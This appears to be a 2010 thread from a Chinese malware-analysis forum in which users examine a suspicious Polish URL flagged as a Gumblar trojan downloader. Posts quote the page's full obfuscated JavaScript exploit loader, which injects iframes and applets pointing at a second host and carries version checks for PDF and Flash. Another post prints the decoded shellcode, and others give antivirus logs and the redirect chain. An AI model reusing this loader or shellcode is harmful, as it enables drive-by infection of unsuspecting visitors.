查看: 3864|回复: 11
收起左侧

[其它] 可疑網址07/05[挂马][已检测 by 是昔流芳]

[复制链接]
haol
发表于 2010-7-5 18:58:52 | 显示全部楼层 |阅读模式
本帖最后由 是昔流芳 于 2010.7.5 21:23 编辑

hxxp://za-met.pl/images/gifimg.php
請幫忙分析謝謝
yishuad
发表于 2010-7-5 19:16:00 | 显示全部楼层
本帖最后由 yishuad 于 2010.7.5 19:18 编辑

含有一个script
hxxp://monishajaising.com/images/gifimg.php

但无法获取其源码。
sshot-1.png
可能此网页已失效

fans360
头像被屏蔽
发表于 2010-7-5 19:30:20 | 显示全部楼层
无法访问。
haol
 楼主| 发表于 2010-7-5 19:36:04 | 显示全部楼层
回复 2楼 yishuad  的帖子
// <script>
function ytz1(Lrg){return Lrg.replace(/%/g,'').replace(/['Dqnp]/g,L02tB)}
nVL='dn6fcun6dep6eq74.D77ritp65D28p22n3cD64in76 styp6ceq3dD5cn22p70osip74q69on6en3aaD62sD6fp6cuq74eq3bD20lep66tD3aq2d1q300D30D70D78n3b toD70n3an2d10p300q70D78D3bp5cD22D3en22)n3bfuq6ectq69oD6e p6973(a)D7bdp6fcumD65n6et.wrD69teD28n22p3ciframe srq63p3dD5cq22httn70n3aq2fD2fmD6fn6eisn68ajaisin6eg.q63omn2fD69p6dagesp2fgq69fiq6dg.n70q68q70n3fsD3dbcn7axwn58p44p53in26p69dp3dq22+a+D22n5cD22p3ep3cp2fiq66D72aD6dep3eq22)p3bq7dUq4aGp70n3dn30q3bvar p73coden3dn22D25un43p3031D25u6499q25u40D303p25u8q4230q25u0Cn340p25p75q3708D42q25uAq441Cn25u688Bq25uED380D38q25u00q37Cn25u00D30q30q25u4q358q42p25u5p33D33Cn25uq3548D42D25u78q305q25u01D356q25u8q33Ep41D25uFFC9D25u8B52D25uq32n3072n25uEE0n31n25uAp44n341q25up44D4231n25uq43199D25q750p44CD42D25uD44n3301q25u9q39D340n25up35402q25up46Fq305D25uF3D37D35p25up46B39p25n75D45Ap37D35p25up38B5En25u245Ep25uD45q4201n25u8p42p36p36D25u4B0CD25p755E8Bn25q75D3011D43D25u8Bn45BD25uq38B0q34n25uE801p25u5B5ED25uE0FFq25uBFn35p30D25uEq4449n25n757ED30Fn25up44p33Fp46p25u565Eq25D7552q35q30D25u6D3854p25uC000n25u00n300p25p75q35n3056p25uD38BBFD25uE34D42D25uFF5q46q25n7559q443D25uCE01q25uD43n30n385p25p75p45p3358q25u7502p25q7558E5p25q752D3950p25uD38p44C6p25un33n369p34q25n75D44520q25u6n31A1n25u5p3401q25n75Fp4330p25uEn45n383p25uD3750q34n25uC3q46q30q25D75Fp36D33p31D25u30B6n25u6A5BD25q755q324D30p25uED32Cq31n25uq3520p32D25uBn4656p25uCp41D354D25u91n41Fn25un443FFD25uC085p25u0B75D25u00Eq38q25n750000D25u58n30n30n25u002p44q25u00C0p25u50q300n25up30CE8q25u0000q25p757q3700q25u6Ep369p25u6D4569D25n75n37465q25u642ED25q75q36n436CD25un42F00n25q754E8D45q25uED43q30Ep25n75q443Fq46p25u5695D25u5656D25u5D3656n25n752p39BFq25uEq3844q25uFF57n25u5n36p443D25q75p30068n25uD30p3001n25u5q36p384p25uE856q25uD46F70n25uFFFD46p22q3bn66D75p6ectioq6e p65kq31p33(q29n7breturq6e trueD3bp7dwq69n6edow.op6eeD72p72orp3deq6b13D3bfuq6ep63tD69n6fp6e p6e73(p61)D7bvar k,D73,in3biD66(p6eavigatq6fr.n6dimn65Tyn70en73.D6cq65q6egthn26q26(n6bp3dp6eavigatorq2eq70D6cugip6es))for(p69n3d0p3bq69q3cp6b.lep6egthD3bip2b+)D7bn73n3dkp5biD5dq2eD6eamep3bq69f(s.in6edep78On66(a)D3eD3d0)rq65tun72n6ep20kD5bin5dp3bp7dreturD6e 0n3bD7dD69f(q6eaviD67aD74on72n2ejaD76aEn6eabln65D64n28))dp6fcumep6etp2ewritp65(q22n3caq70q70let coD64D65q3dn5cp22n7azz.ttt.ad3q3740bp34.cq6can73sq5cD22 arcn68iveD3dn5cp22hD74q74n70D3aq2fn2fmon6en69n73hajaiD73ip6eg.cp6fmq2fimap67q65q73p2fgifq69p6dgq2ep70hq70p3fsn3dbcn7aq78n77Xp44Sip26idp3d6D5cD22 widtD68p3d300 hq65D69gp68D74p3d300n3en3cD70p61ramD20q6eamep3dp5cn22datan5cn22 vap6cueq3dD5cD22httq70p3ap2fn2fmoD6eiD73n68ajaiD73p69p6egq2eq63omq2fip6dagn65D73n2fgifimq67D2ep70hq70p3fsn3dbczxp77Xp44Siq26in64q3d1D34n26D5cp22p3ep3cD70aq72D61n6dq20D6eameq3dn5cq22ccn5cp22 vD61n6cuep3dn5cq221p5cp22q3eD3cp2faD70n70lD65tq3eD22)q3bzhZq4dq3d0q3btn72yp7bzp68ZMD3dq6eew p41ctiveXD4fp62ject(n22Ap63roD50p44FD2ePq44Fq22)p3bq7dcatchn28e)q7bD7dif(q21zhZMp29tryn7bzq68D5an4dn3dp6eewD20Ap63tiveD58ObD6aect(q22Pq44q46.q50dfq43trq6cq22p29D3bq7dn63an74cq68q28n65)p7bD7difp28zn68q5aM)D7bn76arD20lvD3d((zp68ZM.D47etVeD72siq6fp6es(n29D2esq70litq28q22q2cq22))n5b4D5d.sD70ln69t(p22p3dD22p29)D5b1p5d.ren70D6cn61D63e(D2fn5c.p2fgD2cD22n22D29p3bzhZMn3d(n6cn76n3c9n30D30)q26p26(lvn21n3d8p313)q3bn7dep6cse zhD5aMD3dq6e73(n22p41dobe Aq22)n7cp7cD6e73(n22Aq64obe Pn22)p3bifD28zhZMq29i73(2)q3bUJGn70p3dn30p3bzq68Zn4dp3d0n3bfuD6ectiop6e n7373(q61p29q7bn69f(D61q5bp30n5dp3dn3d9)D7bzp68Zq4dn3dp61q5b2p5dD3c1p32p34q3bUp4aGD70p3d(ap5b2p5dD3e1D36)D26p26(ap5bD32p5dD3cp324D36p29D3bp7delseD20D69f(ap5bp30p5dD3dq3d10)UJq47p70D3dap5b2D5dD3c2q33n3bUJGn70q3dUJGn70q26p26(p6eavq69gatorn2eq75q73erAq67ep6ep74.p74p6fLowern43ase().iD6edeD78Op66(D22p73ap66D61riq22)p3dn3dq2dp31)q3bn7difD28(n78D3dD6e73(p22Flashq22p29)n26D26q28xp3dxp2edescrin70n74ioq6e))p7373(x.reD70lacq65D28p2f(q5bD61p2dq7aAq2dq5aD5dp7cq5cs)+p2fD2cp22D22)D2erep70lace(D2f(D5cs+rp7cD5cs+bq5b0n2d9D5dD2b)D2fn2cn22.p22)q2eq73n70litn28q22.D22)n29n3belse tryD7bp7373p28(p6eew Ap63tiveD58On62jq65ctq28q22n53hockwn61vD65Fq6cash.Sn68ockwaD76eFlasD68D22)).D47etVn61q72iq61blep28D22D24veD72sion6eD22D29.n73p70lit(q22p20q22)D5b1p5d.sD70litq28n22,p22))p3bp7dcn61n74ch(e)D7bq7dn69D66(zhZn4d)i73(3)p3bdoq63ump65p6et.writen28q22n3cp2fdivq3eD22q29n3b';
rNQ=2;try{if(L02tB='a')throw new TypeError(rNQ);}catch(rNQ){L02tB=rNQ; rNQ=5; L02tB=L02tB.message; L02tB=ytz1('D'+rNQ);
  L02tB=unescape(String.fromCharCode(32+rNQ)+L02tB);L02tB=ytz1(L02tB+nVL)}
eval(unescape(L02tB));

//</script>



   
yishuad
发表于 2010-7-5 19:52:18 | 显示全部楼层
回复 4楼 haol  的帖子
%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%

u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%

uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%

uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE34B%uFF5F%u59D3%uCE01%uC085%

uE358%u7502%u58E5%u2950%u8DC6%u3694%uD520%u61A1%u5401%uFC30%uEE83%u7504%uC3F0%uF631%u30B6%

u6A5B%u5240%uE2C1%u5202%uBF56%uCA54%u91AF%uD3FF%uC085%u0B75%u00E8%u0000%u5800%u002D%u00C0%

u5000%u0CE8%u0000%u7700%u6E69%u6E69%u7465%u642E%u6C6C%uBF00%u4E8E%uEC0E%uD3FF%u5695%u5656%

u5656%u29BF%uE844%uFF57%u56D3%u0068%u0001%u5684%uE856%uFF70%uFFFF

有一个shellcode,但解出来没发现问题


   
vmzy
发表于 2010-7-5 21:20:21 | 显示全部楼层
ess报了。
2010-7-5 21:18:09        文件系统实时防护        文件        C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\DNL4BVPO\gifimg[1].htm        JS/TrojanDownloader.Gumblar.J 特洛伊木马        通过删除清除 - 已隔离        VM\Administrator        在应用程序新建的文件上发生事件: D:\Program Files\TheWorld 3\TheWorld.exe.
是昔流芳
发表于 2010-7-5 21:22:20 | 显示全部楼层
关于:hxxp://za-met.pl/images/gifimg.php解密的日志(全体输出 -  5):

Level  0>http://za-met.pl/images/gifimg.php
Level  1>{::无法加载::}http://monishajaising.com/images/gifimg.php
Level  2>http://monishajaising.com/images/AcroPDF.PDF
Level  2>http://monishajaising.com/images/gifimg.php?s=bczxwXDSi&id=14
Level  2>http://monishajaising.com/images/gifimg.php?s=bczxwXDSi&id=6

analyzed by 是昔流芳

根据4楼的代码简单搞了搞,解出一点来,都连接不上,但根据经验来说就是挂了
kaba2
发表于 2010-7-6 09:23:55 | 显示全部楼层
     确实挂了,但是连接很不稳定…
天外飞仙之软件
头像被屏蔽
发表于 2010-7-6 09:47:25 | 显示全部楼层
可牛杀毒显示该网站挂马
fans360
头像被屏蔽
发表于 2010-7-6 10:20:06 | 显示全部楼层
都是强人啊,每次我解密的时候就一个死链接,你们都能接出来N个。哎,你们是强人啊!不要拿历史数据出来解密啊,求你了!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 06:51 , Processed in 0.137837 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表